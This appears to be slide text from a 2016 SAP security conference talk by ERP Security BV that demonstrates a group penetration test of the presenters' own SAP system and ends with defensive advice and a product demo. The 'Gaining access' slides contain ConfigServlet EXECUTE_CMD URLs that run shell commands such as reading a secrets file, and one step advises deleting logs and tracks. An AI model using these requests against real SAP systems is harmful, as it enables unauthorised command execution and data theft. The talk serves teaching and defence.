Embed Size (px)
Citation preview
SYTYCH#16So You Think You Can Hack
• Company specialised in securing SAP systems and infrastructures• SAP Security consulting• Regular presenters on SAP Security in Security conferences• Research: In worldwide top 5 for found SAP Security vulnerabilities• Developer Protect4S - Security Analyser for SAPTM
• SAP Development Partner• Our mission is to raise the security of mission–critical SAP platforms with
minimal impact on day–to–day business.
Joris van de VisFred van de Langenberg Robin Vleeschhouwer
ERP Security
Let’s do something unique
Collective hack = Grouphack ≠ Grouphug
What are we going to do…
Hack a SAP system collectively
But wait…
Isn’t that illegal?
Yes (in many cases) it is. Hence the disclaimer:
Hacking is illegal and very naughty. This presentation is not aiming to stimulate or approve hacking. This presentation is meant for academic and educational purposes only.
Find the Get-out-of-jail-free card here:
I herewith approve all participants of SitNL#16to hack my SAP system on host XXX Only on November 26 2016.
<TIP>During this presentation QR codes will be shown to simplify calling long URLS’s.
You might want to consider installing an App on your mobile phone called a QR code scanner to prevent typing really long URL’s. </TIP>
Handy…
Anatomy of a hack…
We will go through some common steps of a a hack / penetration test
Step 1 – ReconnaissanceGathering of data about the target.
Step 2 – Scanning / enumerationScan the perimeter internally and externally for vulnerabilities.
Step 3 – Gain accessUse the gathered info retrieved from previous steps to gain access to the target.
Step 4 – Keep access / go furtherTo successfully perform an attack access must be maintained over a certain period of time. Also further penetration of the target might be needed to go for the targets crown jewels.
Step 5 – Delete tracksBe cautious, don’t get noticed or caught. Make sure to delete your tracks, logs, tooling, created users, etc, etc.
Step 1: Reconnaissance
Step 1 - Reconnaissance
Try to gather a much information as possible on the business and way of working of the target. Find information like how they operate, type of used systems, procedures, IP-range, domain names, mail serves, dns, etc, etc..
Tooling: social media, (Facebook, linkedin), Google and for example shodan and censys
http://whois.domaintools.com/erp-sec.com https://www.shodan.io/search?query=sap+netweaver
Step 1: Reconnaissance
Step 2: Scanning
Step 2 – Scanning / enumerationScan the environment internally and externally to get a clear image of the target. Scanning is done to find open ports with behind them hopefully vulnerable services. Scanning is most often done on network level, think about portscans, scans for specific services, firewall scans, scans to detect Operating Systeem version, etc.
Tooling: network scanning- and other scanning tools like NMAP, responder.py, network sniffing tools like Wireshark, keyloggers, etc, etc (Really too many to name)
Step 2: Scanning
Step 2 – Scanning / enumeration
https://pentest-tools.com/network-vulnerability-scanning/tcp-port-scanner-online-nmap
1
23
4
http://<XXXX>:50000/bestaatsinterklaasnuwelofniet?
Step 2: Scanning
Step 3: Gaining access
Step 3 – Gaining access
Try to gain access to 1 or more systems using information gathered before. From there extract valuable information or further penetrate the landscape.
Tooling: Create your own, use exploitation tools to exploit vulnerabilities via SQL injection, xss, csrf, RCE, directory traversal, code injection, verb tampering, etc. Again, too many to name. Use social engineering to hack the human.
http://<XXXXXXXX>:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ls
http://XXXXXXXXXXXXXXX:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20supergeheimen.txt
Step 3: Gaining access
Towards solutions
- There is no silver bullet solution
- SAP (Platform) security goes beyond team boundaries. Involve:- SAP Basis team
- SAP Authorisations team
- Database team
- Operating system team
- Network team
- Involve management, not a pure technical party
- Create a Security process, instead of a onetime project
- You might consider using tooling to support
this process.
Demo Protect4S
SAP, R/3, ABAP, SAP GUI, SAP NetWeaver and other SAP products and services mentioned herein as well as their respective logos are trademarks or registered trademarks of SAP AG in Germany and other countries.
All other product and service names mentioned are the trademarks of their respective companies. Data contained in this document serves informational purposes only.
The authors assume no responsibility for errors or omissions in this document. The authors do not warrant the accuracy or completeness of the information, text, graphics, links, or other items contained within this material. This document is provided without a warranty of any kind, either express or implied, including but not limited to the implied warranties of merchantability, fitness for a particular purpose, or non-infringement.
The authors shall have no liability for damages of any kind including without limitation direct, special, indirect, or consequential damages that may result from the use of this document.
SAP AG is neither the author nor the publisher of this publication and is not responsible for its content, and SAP Group shall not be liable for errors or omissions with respect to the materials.
No part of this document may be reproduced without the prior written permission of ERP Security BV. © 2013 ERP Security BV.
Disclaimer
